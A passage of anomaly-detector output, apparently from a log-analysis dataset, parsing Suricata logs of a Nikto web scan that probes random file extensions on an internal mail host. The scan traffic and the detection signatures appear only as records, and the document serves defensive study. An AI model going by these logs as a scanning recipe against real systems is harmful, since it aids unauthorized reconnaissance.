(Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.iso8859-2\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.iso8859-2", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46802, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":964576624172563,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 964576624172563, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.189008+0000\",\"flow_id\":964576624172563,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46802,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.iso8859-2\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.iso8859-2\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80", "/parser/model/time": 1583349514.192062, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46804, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.192062 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46804 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.php3+", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.192275, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.php3+\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.php3+", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46804, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1233325612787490,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1233325612787490, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.192275+0000\",\"flow_id\":1233325612787490,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46804,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.php3+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.php3+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80", "/parser/model/time": 1583349514.194298, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46806, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.194298 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46806 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.cs", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.194537, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.cs\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.cs", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46806, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":2223921164907347,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 2223921164907347, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.194537+0000\",\"flow_id\":2223921164907347,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46806,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.cs\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.cs\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.19 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80", "/parser/model/time": 1583349514.197206, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46808, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.197206 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46808 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.2 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.tcl", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.197410+0000\",\"flow_id\":728237458783181,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46808,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.tcl\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.tcl\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": 